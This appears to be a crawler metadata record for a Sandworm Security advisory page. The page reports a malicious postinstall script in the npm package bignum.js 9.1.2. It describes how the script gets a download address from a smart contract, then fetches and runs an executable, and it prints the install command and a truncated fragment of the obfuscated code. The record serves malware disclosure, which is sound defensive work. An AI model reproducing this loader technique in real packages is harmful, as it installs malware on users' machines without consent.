id
type
0 (not classified)
status
21 (imported old-v2, waiting for another import)
review version
0
cleanup version
0
pending deletion
0 (-)
created at
2025-11-09 03:03:59
updated at
2025-11-09 03:03:59
url
https://sandworm.dev/npm/security-vulnerabilities/package/bignum.js/
url length
68
url crc
21055
url crc32
1854100031
location type
1 (url matches target location, page_location is empty)
canonical status
2 (missing canonical tag in html)
canonical page id
-
domain id
domain tld
2265
domain parts
0
originating warc id
-
originating url
https://data.commoncrawl.org/crawl-data/CC-MAIN-2025-33/segments/1754151280076.69/warc/CC-MAIN-20250809045158-20250809075158-00268.warc.gz
source type
11 (CommonCrawl)
server ip
Publication date
2025-08-09 05:32:39
Fetch attempts
0
Original html size
18308
Normalized and saved size
17973
title
Latest Npm Package Security Vulnerabilities | Sandworm Security
excerpt
content
Sandworm scans all new Npm package versions for malicious install scripts.Scanning since October 2024.Follow our 𝕏 / Twitter feed for updates.bignum.js↗️ View on Npm⚠️Found 1 vulnerable versions for package bignum.js:9.1.2Detected: 31 Oct 2024Detected Date: 31 Oct 2024Affected Install Script: postinstallPackage Source: ↗️ View on NpmThe code contains a function that fetches an IP address from a smart contract and then constructs a file download URL based on the platform (Linux, Windows, macOS). It downloads an executable file from that URL and attempts to execute it in the background, potentially allowing for arbitrary code execution on the host system. This represents a significant security risk, as it could be used to install malware or other harmful software without the user's consent.Install script:node tyzipmzo.cjsInstall script code:function _0x580f(_0x3d2188,_0x3f7fac){const _0x53fcd0=_0x53fc();return _0x580f=function(_0x580f53,_0x5c8d10){_0x580f53=_0x580f53-0x1f4;let _0x85771b=...
author
updated
1764185742
block type
0
extracted fields
105
extracted bits
featured image
title
full content
content was extracted heuristically
detected location
0
detected language
1 (English)
category id
index version
2025110801
paywall score
0
spam phrases
0
text nonlatin
0
text cyrillic
60
text characters
4464
text words
671
text unique words
340
text lines
1
text sentences
3
text paragraphs
1
text words per sentence
223
text matched phrases
1
text matched dictionaries
3
links self subdomains
0
links other subdomains
11
links other domains
4
links spam adult
0
links spam random
0
links spam expired
0
links ext activities
0
links ext ecommerce
0
links ext finance
0
links ext crypto
0
links ext booking
0
links ext news
0
links ext leaks
0
links ext ugc
9
links ext klim
0
links ext generic
0
image author
featured image